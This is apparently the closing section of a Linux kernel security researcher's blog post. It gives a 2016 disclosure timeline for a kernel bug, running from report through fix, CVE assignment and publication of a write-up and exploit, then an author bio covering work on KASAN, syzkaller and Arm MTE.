  • 13 Feb, 2016 — Bug reported to security@kernel.org
  • 13 Feb, 2016 — Mainline fix is committed
  • 14 Feb, 2016 — CVE is assigned
  • 22 Feb, 2016 — Write-up and exploit published

🐱 About me

I’m a security researcher and a software engineer focusing on the Linux kernel.

I contributed to several security-related Linux kernel subsystems and tools: KASAN — a fast dynamic bug detector, syzkaller — a production-grade kernel fuzzer, and Arm Memory Tagging Extension — an exploit mitigation.

I also wrote a few Linux kernel exploits for the bugs I found.

Occasionally, I’m having fun with hardware hacking, teaching, and other random stuff.

Follow me @andreyknvl on Twitter or @xairy on LinkedIn for notifications about new articles and talks.